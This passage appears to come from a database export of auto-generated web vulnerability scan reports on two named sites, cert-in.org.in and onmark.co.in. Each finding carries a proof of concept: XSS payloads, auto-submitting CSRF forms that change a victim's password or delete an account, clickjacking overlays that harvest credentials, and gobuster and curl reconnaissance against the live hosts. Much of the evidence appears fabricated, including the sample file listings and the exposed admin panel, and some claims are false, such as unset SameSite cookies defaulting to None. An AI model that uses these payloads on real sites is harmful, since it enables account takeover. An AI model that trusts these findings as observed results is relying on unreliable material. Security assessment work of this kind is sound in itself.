(CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nThe `default-src` CSP directive is entirely absent from the main page’s HTTP headers. As a foundational policy component, its absence leaves numerous content categories unprotected, reducing overall XSS mitigation efficacy.\n\n**Attack Scenario (Proof of Concept)**\nNo `default-src` defined:\n```\nContent-Security-Policy: script-src 'self'; img-src *\n```\nAllows images from any source and defaults remaining directives to unrestricted behavior.\n\n**Business Impact**\nPartial CSP implementation offers limited protection and creates false confidence in security posture, especially concerning modern web threats reliant on multi-vector payloads.\n\n---\n\n### Informational Findings\n\n#### Multiple IPs Found / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nThe asset resolves to multiple IP addresses: 103.218.109.197, 14.139.54.229, and 59.176.167.109. This indicates that the domain is likely hosted behind a load balancer or distributed infrastructure. While not inherently a vulnerability, identifying multiple endpoints can provide attackers with additional reconnaissance vectors, including potential bypasses if some servers are misconfigured differently than others.\n\n**Attack Scenario (Proof of Concept)**\nAn attacker may perform DNS enumeration using tools like `dig` or `nslookup` to resolve all A records associated with the domain:\n```bash\n$ dig A www.cert-in.org.in +short\n103.218.109.197\n14.139.54.229\n59.176.167.109\n```\nSubsequently, they may probe each endpoint directly via HTTP(S) to identify version inconsistencies, exposed administrative interfaces, or differing security configurations across backend hosts.\n\n**Business Impact**\nWhile this finding does not pose direct risk, it increases the attack surface by exposing more network endpoints. If any of these IPs host outdated or misconfigured services, it could lead to unauthorized access or service compromise.\n\n---\n\n#### Re-examine Cache-control Directives / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nMissing or improperly configured cache-control headers allow intermediaries (browsers/proxies) to store sensitive content locally. Without explicit directives like `no-store` or `private`, confidential data may persist beyond intended scope.\n\n**Attack Scenario (Proof of Concept)**\nSensitive API response lacks cache headers:\n```\nHTTP/1.1 200 OK\nContent-Type: application/json\n```\nBrowser caches response, enabling retrieval after logout via back-button navigation or history inspection.\n\n**Business Impact**\nPotential privacy violations and unauthorized access to authenticated sessions or personal data stored in local caches.\n\n---\n\n#### Re-examine Cache-control Directives / robots.txt\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/robots.txt |\n\n**Description**\nAbsence of cache-control headers on public files like `robots.txt` may cause outdated versions to linger in proxy caches, misleading crawlers about current disallowances or sitemaps.\n\n**Attack Scenario (Proof of Concept)**\nOlder version of `robots.txt` remains cached despite recent changes:\n```\nDisallow: /admin/\n```\nSearch engines continue respecting old rules until TTL expires, delaying discovery of newly exposed paths.\n\n**Business Impact**\nStale caching affects crawl efficiency and delays indexing improvements, impacting discoverability and potentially exposing deprecated sections prematurely.\n\n---\n\n#### Re-examine Cache-control Directives / sitemap.xml\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/sitemap.xml |\n\n**Description**\nLack of cache-control directives on `sitemap.xml` leads to inconsistent propagation across distributed networks. Outdated sitemaps may remain active longer than necessary, causing incorrect indexing behaviors.\n\n**Attack Scenario (Proof of Concept)**\nNewly removed pages still listed in cached sitemap:\n```xml\n<url><loc>/deprecated-page.html</loc></url>\n```\nSearch bots revisit non-existent URLs repeatedly, generating unnecessary error traffic.\n\n**Business Impact**\nDegraded SEO performance and increased server load due to redundant requests stemming from stale sitemap caches.\n\n---\n\n#### User Agent Fuzzer / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nDifferences in server responses based on varying User-Agent strings suggest adaptive logic or device-specific routing. While useful for responsive design, inconsistent behavior may hint at hidden functionality or debug interfaces.\n\n**Attack Scenario (Proof of Concept)**\nSending modified UA string triggers alternate response:\n```bash\ncurl -H \"User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1)\" https://www.cert-in.org.in/\n```\nServer returns different HTML layout or exposes admin panel elements.\n\n**Business Impact**\nUnintended feature toggling or debugging features exposed to public can facilitate further probing or privilege escalation attempts.\n\n---\n\n#### User Agent Fuzzer / cert-in.org.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in |\n\n**Description**\nBehavioral variance upon altering User-Agent headers suggests conditional rendering or routing logic. This pattern often correlates with mobile/desktop switching or bot detection mechanisms.\n\n**Attack Scenario (Proof of Concept)**\nSwitching between desktop and mobile UAs yields distinct responses:\n```bash\ncurl -H \"User-Agent: iPhone Safari\" https://www.cert-in.org.in/\ncurl -H \"User-Agent: Chrome Desktop\" https://www.cert-in.org.in/\n```\nComparing hashes reveals divergent output templates.\n\n**Business Impact**\nInconsistent delivery models complicate testing coverage and increase likelihood of undetected vulnerabilities specific to certain clients.\n\n---\n\n#### User Agent Fuzzer / sitemap.xml\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/sitemap.xml |\n\n**Description**\nAltering User-Agent strings while accessing `sitemap.xml` produces varied outputs, suggesting dynamic generation tailored to requester type. Such variability may introduce inconsistencies in search engine indexing workflows.\n\n**Attack Scenario (Proof of Concept)**\nDifferent sitemaps returned depending on UA:\n```bash\ncurl -H \"User-Agent: Bingbot\" https://www.cert-in.org.in/sitemap.xml\ncurl -H \"User-Agent: Firefox\" https://www.cert-in.org.in/sitemap.xml\n```\nEach call returns unique `<urlset>` contents.\n\n**Business Impact**\nFragmented sitemap delivery hampers unified crawling strategies and introduces ambiguity in content governance.\n\n---\n\n#### User Agent Fuzzer / robots.txt\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/robots.txt |\n\n**Description**\nResponses differ when querying `robots.txt` with various User-Agents, implying rule customization per crawler identity. Misconfigurations here can result in unintended exclusions or exposures.\n\n**Attack Scenario (Proof of Concept)**\nCustomized rules served to specific bots:\n```txt\nUser-agent: Googlebot\nDisallow: /private/\n\nUser-agent: *\nAllow: /\n```\nManual override bypasses general restrictions.\n\n**Business Impact**\nMisaligned robot directives affect crawl permissions and expose unintended directories to automated scanners.\n\n---\n\n#### User Agent Fuzzer / Images Directory\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/Images |\n\n**Description**\nAccessing the `/Images` directory with altered User-Agent strings results in differing directory listings or file availability. This inconsistency may point to environment-specific deployments or legacy configurations.\n\n**Attack Scenario (Proof of Concept)**\nDirectory listing enabled only for mobile UAs:\n```bash\ncurl -H \"User-Agent: Android Browser\" https://www.cert-in.org.in/Images/\n```\nReturns full index instead of forbidden status.\n\n**Business Impact**\nExposure of directory contents increases risk of discovering backup files, temporary uploads, or development artifacts.","summary":{"total":23}},"summary":{"total":23}},{"_id":{"$oid":"6a1f302ecdcdcbd0a53116bf"},"created_at":{"$date":"2026-06-02T19:34:06.510Z"},"url":"https://onmark.co.in/nmu/","tool":"generate_web_vulnerability_report","result":{"url":"https://onmark.co.in/nmu/","category":"web_vulnerability","timestamp":"2026-06-02T19:34:06.504612+00:00","report":"### [Web Server Manual Found / https://onmark.co.in/nmu/ / /manual/]\n\n| Field | Value |\n|---|---|\n| Severity | INFO |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**  \nThe presence of `/manual/` indicates that the web server hosts documentation related to its configuration or operation. While not inherently insecure, exposing such directories publicly may provide attackers with insights into the software stack, version numbers, and potential misconfigurations. This information can be leveraged during reconnaissance phases of an attack.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker performs directory brute-forcing using tools like `dirb` or `gobuster`, identifying accessible paths including `/manual/`. Upon visiting the path, they discover detailed documentation about the server environment, potentially revealing outdated modules or insecure configurations.\n\nExample command:\n```bash\ngobuster dir -u https://onmark.co.in/nmu/ -w /path/to/wordlist.txt\n```\n\n**Business Impact**  \nExposure of internal documentation increases the attack surface by providing adversaries with contextual knowledge about the system architecture. Although no direct exploitation occurs, this contributes to targeted attacks and reduces the effort required for successful compromise.\n\n---\n\n### [Directory Indexing Found / https://onmark.co.in/nmu/ / /manual/images/]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**  \nDirectory indexing allows users to list all files within a given directory if no index file is present. In this case, accessing `/manual/images/` reveals a browsable list of image resources. This exposes filenames, versions, and possibly sensitive artifacts inadvertently left behind.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker navigates directly to `https://onmark.co.in/nmu/manual/images/` and observes a directory listing containing multiple files. They download these assets to analyze metadata or search for hardcoded credentials, development notes, or legacy components indicating vulnerabilities.\n\nSample browser access:\n```\nGET /manual/images/\nHost: onmark.co.in\n```\n\nResponse includes:\n```html\n<pre>\n<a href=\"logo.png\">logo.png</a>     2024-01-01 12:00\n<a href=\"dev_notes.txt\">dev_notes.txt</a>   2023-12-15 10:30\n</pre>\n```\n\n**Business Impact**  \nSensitive project-related files might be exposed unintentionally, leading to unauthorized access to intellectual property, developer comments, or staging/test environments. Attackers can use this data to refine targeting strategies or exploit weak points in the infrastructure.\n\n---\n\n### [Apache Default File Found / https://onmark.co.in/nmu/ / /icons/README]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**  \nThe presence of `/icons/README` suggests that default Apache installation files remain accessible. These files often contain version-specific details or references to other default paths, which can aid fingerprinting efforts and expose unnecessary information about the server setup.\n\n**Attack Scenario (Proof of Concept)**  \nBy requesting `https://onmark.co.in/nmu/icons/README`, an attacker retrieves the contents of the README file, which typically contains Apache version info and usage instructions. Using this, they correlate known vulnerabilities associated with that specific version.\n\nRequest:\n```http\nGET /icons/README HTTP/1.1\nHost: onmark.co.in\n```\n\nResponse excerpt:\n```\nApache HTTP Server Documentation Project\nVersion 2.4.x\n...\n```\n\n**Business Impact**  \nRevealing server version details facilitates targeted exploitation attempts based on known CVEs tied to those versions. It also signals poor hardening practices, increasing confidence among attackers regarding further exploration opportunities.\n\n---\n\n### [Deprecated X-Frame-Options Header / https://onmark.co.in/nmu/ / /]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**  \nThe `X-Frame-Options` header has been superseded by the more flexible `Content-Security-Policy` (CSP) with the `frame-ancestors` directive. Its continued use implies outdated security posture and may leave applications vulnerable to clickjacking unless properly configured.\n\n**Attack Scenario (Proof of Concept)**  \nAn attacker creates a malicious iframe embedding the vulnerable page at `https://onmark.co.in/nmu/`. Since there's no modern CSP protection, the embedded content renders normally, enabling UI redressing attacks where victims unknowingly interact with disguised elements.\n\nMalicious HTML snippet:\n```html\n<iframe src=\"https://onmark.co.in/nmu/\" width=\"100%\" height=\"500\"></iframe>\n```\n\n**Business Impact**  \nWithout proper framing controls, attackers can trick users into performing unintended actions—such as submitting forms or clicking buttons—within the context of their authenticated sessions, resulting in account takeovers or fraudulent transactions.\n\n---\n\n### [Missing X-Content-Type-Options Header / https://onmark.co.in/nmu/ / /]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**  \nThe absence of the `X-Content-Type-Options: nosniff` header allows browsers to perform MIME sniffing, interpreting content differently than intended. This behavior can lead to XSS when untrusted input is rendered as executable code due to incorrect type inference.\n\n**Attack Scenario (Proof of Concept)**  \nSuppose an attacker uploads a file named `exploit.jpg` that actually contains JavaScript. Without the `nosniff` header, the browser interprets it as script rather than image content upon retrieval, executing arbitrary code under the domain’s origin.\n\nSample upload payload:\n```js\nalert(document.cookie);\n```\n\nUploaded via form submission and later accessed via:\n```\nGET /uploads/exploit.jpg HTTP/1.1\nHost: onmark.co.in\n```\n\nIf interpreted as JS, triggers alert box showing cookies.\n\n**Business Impact**  \nEnables bypasses of content restrictions, facilitating stored/persistent XSS scenarios even when file extensions appear benign. Can result in session hijacking, credential theft, or phishing campaigns leveraging trusted domains.\n\n---\n\n### [Missing Anti-clickjacking Header / https://onmark.co.in/nmu/ / /]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**  \nLack of anti-clickjacking protections enables embedding of the application inside frames controlled by third parties. This vulnerability supports UI redressing attacks where user interactions occur without awareness, compromising confidentiality and integrity.\n\n**Attack Scenario (Proof of Concept)**  \nAttacker crafts a phishing page hosting an invisible overlay over legitimate buttons on the framed site (`https://onmark.co.in/nmu/`). When clicked, victims believe they’re interacting with visible interface elements while triggering unintended actions like transferring funds or changing settings.\n\nHTML example:\n```html\n<style>\niframe { position:absolute; top:0; left:0; opacity:0; z-index:999; }\nbutton { position:relative; z-index:1000; }\n</style>\n\n<button onclick=\"alert('Clicked!')\">Click Me</button>\n<iframe src=\"https://onmark.co.in/nmu/\"></iframe>\n```\n\n**Business Impact**  \nLeads to unauthorized transactions, social engineering exploits, and reputational harm stemming from compromised user trust. Particularly impactful for financial services or administrative portals handling sensitive operations.\n\n---\n\n### [Content Security Policy (CSP) Header Not Set / https://onmark.co.in/nmu/ / /]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**  \nAbsence of a Content Security Policy (CSP) leaves the application open to various client-side injection flaws, particularly reflected/stored XSS. CSP acts as a defense-in-depth mechanism by restricting sources from which scripts, stylesheets, and media can be loaded.\n\n**Attack Scenario (Proof of Concept)**  \nA reflected XSS exists in a parameterized query string. Without CSP, injected scripts execute freely in the victim’s browser:\n\nURL:\n```\nhttps://onmark.co.in/nmu/?search=<script>alert(1)</script>\n```\n\nResultant DOM:\n```html\n<p>You searched for: <script>alert(1)</script></p>\n```\n\nExecutes immediately in browser.\n\n**Business Impact**  \nIncreases likelihood of successful XSS exploitation, enabling session hijacking, keylogging, redirection to malicious sites, and manipulation of displayed content. Critical for protecting both user privacy and organizational reputation.\n\n---\n\n### [Absence of Anti-CSRF Tokens / https://onmark.co.in/nmu/ / /]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 6.5 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**  \nForms lacking anti-CSRF tokens are susceptible to Cross-Site Request Forgery (CSRF), wherein authenticated users unknowingly submit requests crafted by attackers. This bypasses same-origin policy limitations through forged submissions initiated externally.\n\n**Attack Scenario (Proof of Concept)**  \nVictim visits attacker-controlled webpage containing auto-submitting form targeting the vulnerable endpoint:\n\n```html\n<form method=\"POST\" action=\"https://onmark.co.in/nmu/change-password\">\n  <input type=\"hidden\" name=\"new_password\" value=\"attacker123\">\n</form>\n<script>document.forms[0].submit();</script>\n```\n\nUpon loading, victim unknowingly changes password to attacker-controlled value.\n\n**Business Impact**  \nAllows unauthorized modification of user accounts, privilege escalation, or execution of destructive actions under valid authentication contexts. Especially dangerous in high-privilege areas like admin panels or payment systems.\n\n---\n\n### [Sub Resource Integrity Attribute Missing / https://onmark.co.in/nmu/ / /]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**  \nExternal JavaScript/CSS resources included without Subresource Integrity (SRI) attributes lack cryptographic verification. Should the CDN or external host become compromised, attackers gain full control over frontend logic and presentation layers.\n\n**Attack Scenario (Proof of Concept)**  \nAssume jQuery is loaded from a public CDN without SRI:\n```html\n<script src=\"https://code.jquery.com/jquery-3.6.0.min.js\"></script>\n```\n\nIf CDN gets hijacked or cache poisoned, attacker injects malicious script replacing original functionality, stealing credentials or manipulating DOM behavior silently.\n\n**Business Impact**  \nCompromises front-end integrity, opening pathways for supply chain-based attacks. Users remain unaware of altered scripts running in their browsers, undermining trust and exposing them to persistent surveillance or fraud.\n\n---\n\n### [Vulnerable JS Library (bootstrap.min.js) / https://onmark.co.in/nmu/assets/js/bootstrap.min.js / bootstrap.min.js]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/assets/js/bootstrap.min.js |\n\n**Description**  \nUse of outdated or vulnerable JavaScript libraries introduces known weaknesses exploitable remotely. Bootstrap, widely adopted across websites, has historically suffered from XSS, prototype pollution, and event handler injection issues depending on version deployed.\n\n**Attack Scenario (Proof of Concept)**  \nUsing scanner output or manual inspection, attacker identifies Bootstrap v3.3.7 being used. Consulting CVE databases reveals CVE-2018-14040 affecting tooltip/popover sanitization functions. Crafting specially designed markup leads to XSS:\n\nPayload:\n```html\n<div data-toggle=\"tooltip\" title=\"<img src=x onerror=alert(1)>\">Hover me</div>\n```\n\nTriggers XSS when tooltip activated.\n\n**Business Impact**  \nExposes users to XSS risks originating from third-party dependencies. Even minor flaws in popular frameworks can escalate into major breaches once chained with other vulnerabilities.\n\n---\n\n### [Vulnerable JS Library (jquery.min.js) / https://onmark.co.in/nmu/assets/js/jquery.min.js / jquery.min.js]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/assets/js/jquery.min.js |\n\n**Description**  \njQuery remains one of the most prevalent client-side libraries globally. Older versions have documented XSS vectors, especially around selector parsing and DOM manipulation routines. Failure to update increases exposure to well-known exploits.\n\n**Attack Scenario (Proof of Concept)**  \nIdentify jQuery version 1.11.1 in use. Known vulnerability CVE-2015-9251 affects `.load()` function when passed unsanitized user input. Exploitation proceeds via crafted selectors:\n\nInput:\n```javascript\n$('#container').load('evil.html #<img src=x onerror=alert(1)>');\n```\n\nResults in inline script execution.\n\n**Business Impact**  \nLegacy jQuery usage undermines overall application resilience. Given widespread adoption, attackers frequently scan for outdated instances to launch automated XSS campaigns.\n\n---\n\n### [Missing Anti-clickjacking Header / https://onmark.co.in/nmu/user / /user]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/user |\n\n**Description**  \nUser-facing pages lacking clickjacking defenses pose elevated risk compared to general-purpose endpoints. Authentication flows, profile edits, and personal dashboards benefit significantly from robust framing restrictions to prevent impersonation or forced actions.\n\n**Attack Scenario (Proof of Concept)**  \nAttacker constructs a deceptive overlay mimicking login prompts atop actual `/user` dashboard. Victim believes they're entering credentials again but instead submits form to attacker-controlled endpoint capturing session tokens.\n\nOverlay HTML:\n```html\n<div style=\"position:absolute;top:100px;left:200px;z-index:999;\">\n  Enter your password again:<br/>\n  <input type=\"password\" id=\"fakepass\"><br/>\n  <button onclick=\"steal()\">Submit</button>\n</div>\n<iframe src=\"https://onmark.co.in/nmu/user\" style=\"opacity:0;\"></iframe>\n```\n\n**Business Impact**  \nHeightened susceptibility to credential harvesting, session fixation, and unauthorized modifications. User-centric interfaces demand stricter protections due to higher-value targets and frequent interaction patterns.\n\n---\n\n### [Content Security Policy (CSP) Header Not Set / https://onmark.co.in/nmu/user / /user]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/user |\n\n**Description**  \nUser-specific routes often handle dynamic content rendering and personalized views. Omission of CSP here amplifies risks associated with XSS, especially in interactive features involving rich text inputs or collaborative editing capabilities.\n\n**Attack Scenario (Proof of Concept)**  \nProfile update form accepts HTML-like input without escaping. Injected script executes because no CSP blocks inline execution:\n\nInput:\n```html\n<img src=x onerror=\"fetch('/api/profile', {method:'POST', body:JSON.stringify({bio:'hacked'})})\">\n```\n\nUpdates bio field automatically upon rendering.\n\n**Business Impact**  \nElevated chance of persistent XSS impacting individual users’ experiences and potentially escalating to broader system compromise. Personalized sections require enhanced safeguards due to variable trust levels and diverse input handling.\n\n---\n\n### [Absence of Anti-CSRF Tokens / https://onmark.co.in/nmu/user / /user]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 6.5 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/user |\n\n**Description**  \nUser management functions—including profile updates, preferences changes, and notification settings—are prime candidates for CSRF exploitation. Lack of token validation permits attackers to manipulate these aspects surreptitiously.\n\n**Attack Scenario (Proof of Concept)**  \nVictim receives email linking to attacker-hosted page containing hidden form altering notification preferences:\n\n```html\n<form method=\"POST\" action=\"https://onmark.co.in/nmu/user/settings\">\n  <input type=\"hidden\" name=\"notifications_enabled\" value=\"false\">\n</form>\n<script>document.forms[0].submit();</script>\n```\n\nDisables notifications without consent.\n\n**Business Impact**  \nDiminished user experience, reduced engagement metrics, and potential compliance violations. Disabling alerts can mask subsequent compromises, delaying incident detection and response times.\n\n---\n\n### [Sub Resource Integrity Attribute Missing / https://onmark.co.in/nmu/user / /user]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/user |\n\n**Description**  \nUser-facing pages commonly integrate numerous third-party scripts for analytics, advertising, or UI enhancements. Missing SRI tags increase reliance on external integrity, making each dependency a potential vector for compromise.\n\n**Attack Scenario (Proof of Concept)**  \nInclude Google Analytics without SRI:\n```html\n<script async src=\"https://www.googletagmanager.com/gtag/js?id=G-XXXXXXXXXX\"></script>\n```\n\nShould GA servers get breached or DNS hijacked, malicious payloads propagate instantly to all visitors.\n\n**Business Impact**  \nSupply chain threats extend beyond immediate codebase concerns. Compromised external scripts can harvest user activity, inject ads, or redirect traffic, eroding brand credibility and violating privacy expectations.\n\n---\n\n### [Directory Browsing Enabled / https://onmark.co.in/nmu/assets/css/ / /assets/css/]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/assets/css/ |\n\n**Description**  \nPublicly accessible directory listings in static asset folders expose filenames, folder structures, and potentially sensitive styling rules. Such disclosures assist attackers in mapping out application layout and identifying outdated or debug builds.\n\n**Attack Scenario (Proof of Concept)**  \nNavigate to `https://onmark.co.in/nmu/assets/css/` and observe:\n```\nadmin.css\ndebug.css\ntheme.css\n```\n\nDownload `debug.css` to inspect commented-out API keys or internal routing hints.\n\n**Business Impact**  \nLeaks architectural decisions, development artifacts, and possibly hardcoded secrets. Facilitates deeper reconnaissance and lowers barriers to lateral movement within the application ecosystem.\n\n---\n\n### [Directory Browsing Enabled / https://onmark.co.in/nmu/assets/ / /assets/]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/assets/ |\n\n**Description**  \nRoot-level asset directories should never permit browsing. Exposing top-tier structure reveals subdirectories like `/images`, `/js`, and `/fonts`, guiding attackers toward valuable targets for enumeration and exploitation.\n\n**Attack Scenario (Proof of Concept)**  \nAccessing `https://onmark.co.in/nmu/assets/` yields:\n```\ncss/\nimages/\njs/\nfonts/\n```\n\nEach becomes focus point for recursive scanning and deeper probing.\n\n**Business Impact**  \nBroadens reconnaissance scope unnecessarily, encouraging focused attacks against known resource locations. Increases chances of discovering misconfigured permissions or leftover test files.\n\n---\n\n### [Directory Browsing Enabled / https://onmark.co.in/nmu/assets/images/ / /assets/images/]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/assets/images/ |\n\n**Description**  \nImage repositories often house branding materials, screenshots, diagrams, or internal visuals. Public indexing grants visibility into visual assets, sometimes disclosing confidential imagery or staging/testing content.\n\n**Attack Scenario (Proof of Concept)**  \nListing shows:\n```\ninternal_diagram.png\ntest_logo.svg\nprod_banner.jpg\n```\n\nDownloading `internal_diagram.png` reveals backend topology or undocumented workflows.\n\n**Business Impact**  \nUnintended disclosure of proprietary visuals, internal processes, or unreleased products. May violate NDAs or breach marketing embargo periods.\n\n---\n\n### [Directory Browsing Enabled / https://onmark.co.in/nmu/assets/js/ / /assets/js/]\n\n| Field | Value |\n|---|---|\n| Severity | MEDIUM |\n| CVSS Score | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/assets/js/ |\n\n**Description**  \nJavaScript directories frequently store compiled bundles, vendor libraries, and custom modules. Allowing unrestricted listing exposes filenames, build timestamps, and potentially minified source maps aiding reverse-engineering efforts.\n\n**Attack Scenario (Proof of Concept)**  \nDirectory lists:\n```\napp.bundle.js\nvendor.chunk.js\nmain.js.map\n```\n\nRetrieving `.map` file reconstructs readable source code for analysis.\n\n**Business Impact**  \nFacilitates intellectual property theft, competitor intelligence gathering, and identification of implementation flaws. Source maps especially undermine obfuscation efforts meant to protect business logic.\n\n---\n\n### [Cookie No HttpOnly Flag / https://onmark.co.in/nmu/ / /]\n\n| Field | Value |\n|---|---|\n| Severity | LOW |\n| CVSS Score | 3.1 (AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**  \nCookies lacking the `HttpOnly` flag remain accessible to client-side scripts, increasing exposure to XSS-driven session hijacking. Though less critical than missing secure flags, this omission widens attack surface unnecessarily.\n\n**Attack Scenario (Proof of Concept)**  \nXSS vulnerability allows reading document.cookie:\n```javascript\nconsole.log(document.cookie); // Outputs: sessionid=abc123xyz;\n```\n\nSession ID extracted and reused elsewhere.\n\n**Business Impact**  \nMinor elevation in XSS impact severity. While not standalone exploitable, compounds effects of other flaws and violates best practice standards for session management.\n\n---\n\n### [Cookie without SameSite Attribute / https://onmark.co.in/nmu/ / https://onmark.co.in/nmu/]\n\n| Field | Value |\n|---|---|\n| Severity | LOW |\n| CVSS Score | 3.1 (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://onmark.co.in/nmu/ |\n\n**Description**\n\nThe application sets cookies without specifying the `SameSite` attribute. This attribute restricts how cookies are sent with cross-site requests, mitigating risks such as Cross-Site Request Forgery (CSRF), Cross-Site Script Inclusion (XSSI), and certain timing attacks. When unset, browsers default to `SameSite=None`, allowing cookies to be included in all cross-origin requests unless explicitly restricted by other mechanisms like CSRF tokens.\n\nAn attacker could exploit this behavior by crafting malicious websites that trigger authenticated actions on behalf of a logged-in user without their knowledge or consent.\n\n**Attack Scenario (Proof of Concept)**\n\n1. A victim logs into `https://onmark.co.in/nmu/`.\n2. An attacker hosts a malicious site (`https://evil.com`) containing:\n   ```html\n   <img src=\"https://onmark.co.in/nmu/delete-account\" style=\"display:none;\" />\n   ```\n3. When the victim visits `https://evil.com`, the browser automatically sends the session cookie along with the request to `/delete-account`.\n4. If the endpoint does not have additional CSRF protections, the action may execute successfully.\n\nThis demonstrates potential unauthorized actions performed under the victim's authenticated context.\n\n**Business Impact**\n\nWhile low severity individually, lack of `SameSite` protection increases exposure when combined with other vulnerabilities. It contributes to CSRF risk, which can lead to unauthorized transactions, account takeovers, or reputational harm if exploited at scale. Regulatory frameworks like GDPR or PCI DSS may also penalize insufficient 